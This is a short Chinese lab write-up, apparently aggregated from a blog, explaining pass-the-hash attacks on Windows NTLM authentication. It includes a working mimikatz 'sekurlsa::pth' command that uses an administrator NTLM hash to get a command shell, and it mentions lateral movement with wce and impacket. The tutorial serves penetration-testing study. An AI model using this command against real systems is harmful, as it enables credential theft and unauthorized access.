哈希传递PTH(pass the hash)
Posted zpchcbd
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了哈希传递PTH(pass the hash)相关的知识,希望对你有一定的参考价值。
pass the hash原理:
在Windows系统中,通常会使用NTLM身份认证,NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonUser) ,其中hash(哈希)分为LM hash和NT hash,如果密码长度大于15,那么无法生成LM hash。
从Windows Vista和Windows Server 2008开始,微软默认禁用LM hash,如果攻击者获得了hash,就能够在身份验证的时候模拟该用户(即跳过调用API生成hash的过程)
这类攻击适用于:
域/工作组环境
演示:
靶机:win08 r2
攻击:win08 r2
1.靶机中进行读取NTLM HASH:
2.攻击机执行:
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:top.pentest.top /ntlm:044dfa0c35b979ed369f7335b5ea20e0"
会反弹一个cmd窗口回来 发现hash成功传递!!!
总结:在内网渗透中,当我们能够读取ntlm,但是发现抓取不到明文的时候,可以通过hash传递的方式进行横向移动。
对于哈希传递不只是通过mimikatz,还可以通过wce,impacket工具包进行攻击。
以上是关于哈希传递PTH(pass the hash)的主要内容,如果未能解决你的问题,请参考以下文章
如何对Windows系统进行哈希传递攻击(Pass-Hash-Attack)
Hacking Windows Passwords with Pass the Hash